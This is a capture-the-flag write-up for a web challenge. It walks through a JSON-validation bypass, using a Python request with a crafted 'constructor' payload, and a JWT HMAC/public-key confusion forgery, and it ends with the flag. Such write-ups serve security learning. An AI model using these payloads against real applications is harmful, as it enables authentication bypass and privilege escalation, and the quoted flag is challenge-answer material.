There are two vulns here: a bypass of the JSON validation, and a JWT signing vulnerability.

The first part is pretty simple. The app uses `"jwt-simple": "0.5.2"`, which has a vulnerability allowing us to bypass the pattern validation, so we can obtain a JWT token for a 'low privilege' user:

```python
import requests

url = "http://TARGET/"  # placeholder for the challenge base URL

# Check-in request. The crafted "extras" object (note the "constructor" key)
# is what gets past the validator and earns us a low-privilege token.
r = requests.post(url + "checkin", json={
    "firstName": "a",
    "lastName": "b",
    "passport": "123456789",
    "ffp": "CA12345678",
    "extras": {"sssr": {"sssr": "FQTU"}, "constructor": {"name": "Array"}},
})
print(r.status_code, r.text)
```
The JWT library is vulnerable to the token being signed as HMAC with the public key, a common vuln. However, we have no pubkey. I was stuck for ages, until I spotted (thanks Makelaris) https://blog.silentsignal.eu/2021/02/08/abusing-jwt-public-keys-without-the-public-key/ This provided a Docker image where I could simply supply two JWTs, modify the payload in the program and run it. It pulled out the parameters, generated 4 potential public keys, and signed my data with each. Using this, we get the flag:

`union{I_<3_JS0N_4nD_th1ngs_wr4pp3d_in_JS0N}`